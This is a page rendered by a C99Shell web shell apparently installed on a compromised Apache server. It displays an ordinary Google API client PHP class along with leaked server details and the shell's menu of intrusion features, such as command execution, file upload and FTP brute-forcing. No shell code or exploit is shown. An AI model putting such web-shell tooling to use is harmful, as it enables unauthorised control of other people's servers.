!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/main_file/vendor/google/apiclient-services/src/DataprocMetastore/   drwxr-xr-x
Free 12.98 GB of 57.97 GB (22.39%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Service.php (6.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

namespace Google\Service\DataprocMetastore;

class 
Service extends \Google\Model
{
  
/**
   * @var string
   */
  
public $artifactGcsUri;
  
/**
   * @var string
   */
  
public $createTime;
  
/**
   * @var string
   */
  
public $databaseType;
  protected 
$encryptionConfigType EncryptionConfig::class;
  protected 
$encryptionConfigDataType '';
  
/**
   * @var string
   */
  
public $endpointUri;
  protected 
$hiveMetastoreConfigType HiveMetastoreConfig::class;
  protected 
$hiveMetastoreConfigDataType '';
  
/**
   * @var string[]
   */
  
public $labels;
  protected 
$maintenanceWindowType MaintenanceWindow::class;
  protected 
$maintenanceWindowDataType '';
  protected 
$metadataManagementActivityType MetadataManagementActivity::class;
  protected 
$metadataManagementActivityDataType '';
  
/**
   * @var string
   */
  
public $name;
  
/**
   * @var string
   */
  
public $network;
  protected 
$networkConfigType NetworkConfig::class;
  protected 
$networkConfigDataType '';
  
/**
   * @var int
   */
  
public $port;
  
/**
   * @var string
   */
  
public $releaseChannel;
  
/**
   * @var string
   */
  
public $state;
  
/**
   * @var string
   */
  
public $stateMessage;
  protected 
$telemetryConfigType TelemetryConfig::class;
  protected 
$telemetryConfigDataType '';
  
/**
   * @var string
   */
  
public $tier;
  
/**
   * @var string
   */
  
public $uid;
  
/**
   * @var string
   */
  
public $updateTime;

  
/**
   * @param string
   */
  
public function setArtifactGcsUri($artifactGcsUri)
  {
    
$this->artifactGcsUri $artifactGcsUri;
  }
  
/**
   * @return string
   */
  
public function getArtifactGcsUri()
  {
    return 
$this->artifactGcsUri;
  }
  
/**
   * @param string
   */
  
public function setCreateTime($createTime)
  {
    
$this->createTime $createTime;
  }
  
/**
   * @return string
   */
  
public function getCreateTime()
  {
    return 
$this->createTime;
  }
  
/**
   * @param string
   */
  
public function setDatabaseType($databaseType)
  {
    
$this->databaseType $databaseType;
  }
  
/**
   * @return string
   */
  
public function getDatabaseType()
  {
    return 
$this->databaseType;
  }
  
/**
   * @param EncryptionConfig
   */
  
public function setEncryptionConfig(EncryptionConfig $encryptionConfig)
  {
    
$this->encryptionConfig $encryptionConfig;
  }
  
/**
   * @return EncryptionConfig
   */
  
public function getEncryptionConfig()
  {
    return 
$this->encryptionConfig;
  }
  
/**
   * @param string
   */
  
public function setEndpointUri($endpointUri)
  {
    
$this->endpointUri $endpointUri;
  }
  
/**
   * @return string
   */
  
public function getEndpointUri()
  {
    return 
$this->endpointUri;
  }
  
/**
   * @param HiveMetastoreConfig
   */
  
public function setHiveMetastoreConfig(HiveMetastoreConfig $hiveMetastoreConfig)
  {
    
$this->hiveMetastoreConfig $hiveMetastoreConfig;
  }
  
/**
   * @return HiveMetastoreConfig
   */
  
public function getHiveMetastoreConfig()
  {
    return 
$this->hiveMetastoreConfig;
  }
  
/**
   * @param string[]
   */
  
public function setLabels($labels)
  {
    
$this->labels $labels;
  }
  
/**
   * @return string[]
   */
  
public function getLabels()
  {
    return 
$this->labels;
  }
  
/**
   * @param MaintenanceWindow
   */
  
public function setMaintenanceWindow(MaintenanceWindow $maintenanceWindow)
  {
    
$this->maintenanceWindow $maintenanceWindow;
  }
  
/**
   * @return MaintenanceWindow
   */
  
public function getMaintenanceWindow()
  {
    return 
$this->maintenanceWindow;
  }
  
/**
   * @param MetadataManagementActivity
   */
  
public function setMetadataManagementActivity(MetadataManagementActivity $metadataManagementActivity)
  {
    
$this->metadataManagementActivity $metadataManagementActivity;
  }
  
/**
   * @return MetadataManagementActivity
   */
  
public function getMetadataManagementActivity()
  {
    return 
$this->metadataManagementActivity;
  }
  
/**
   * @param string
   */
  
public function setName($name)
  {
    
$this->name $name;
  }
  
/**
   * @return string
   */
  
public function getName()
  {
    return 
$this->name;
  }
  
/**
   * @param string
   */
  
public function setNetwork($network)
  {
    
$this->network $network;
  }
  
/**
   * @return string
   */
  
public function getNetwork()
  {
    return 
$this->network;
  }
  
/**
   * @param NetworkConfig
   */
  
public function setNetworkConfig(NetworkConfig $networkConfig)
  {
    
$this->networkConfig $networkConfig;
  }
  
/**
   * @return NetworkConfig
   */
  
public function getNetworkConfig()
  {
    return 
$this->networkConfig;
  }
  
/**
   * @param int
   */
  
public function setPort($port)
  {
    
$this->port $port;
  }
  
/**
   * @return int
   */
  
public function getPort()
  {
    return 
$this->port;
  }
  
/**
   * @param string
   */
  
public function setReleaseChannel($releaseChannel)
  {
    
$this->releaseChannel $releaseChannel;
  }
  
/**
   * @return string
   */
  
public function getReleaseChannel()
  {
    return 
$this->releaseChannel;
  }
  
/**
   * @param string
   */
  
public function setState($state)
  {
    
$this->state $state;
  }
  
/**
   * @return string
   */
  
public function getState()
  {
    return 
$this->state;
  }
  
/**
   * @param string
   */
  
public function setStateMessage($stateMessage)
  {
    
$this->stateMessage $stateMessage;
  }
  
/**
   * @return string
   */
  
public function getStateMessage()
  {
    return 
$this->stateMessage;
  }
  
/**
   * @param TelemetryConfig
   */
  
public function setTelemetryConfig(TelemetryConfig $telemetryConfig)
  {
    
$this->telemetryConfig $telemetryConfig;
  }
  
/**
   * @return TelemetryConfig
   */
  
public function getTelemetryConfig()
  {
    return 
$this->telemetryConfig;
  }
  
/**
   * @param string
   */
  
public function setTier($tier)
  {
    
$this->tier $tier;
  }
  
/**
   * @return string
   */
  
public function getTier()
  {
    return 
$this->tier;
  }
  
/**
   * @param string
   */
  
public function setUid($uid)
  {
    
$this->uid $uid;
  }
  
/**
   * @return string
   */
  
public function getUid()
  {
    return 
$this->uid;
  }
  
/**
   * @param string
   */
  
public function setUpdateTime($updateTime)
  {
    
$this->updateTime $updateTime;
  }
  
/**
   * @return string
   */
  
public function getUpdateTime()
  {
    return 
$this->updateTime;
  }
}

// Adding a class alias for backwards compatibility with the previous class name.
class_alias(Service::class, 'Google_Service_DataprocMetastore_Service');

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0079 ]--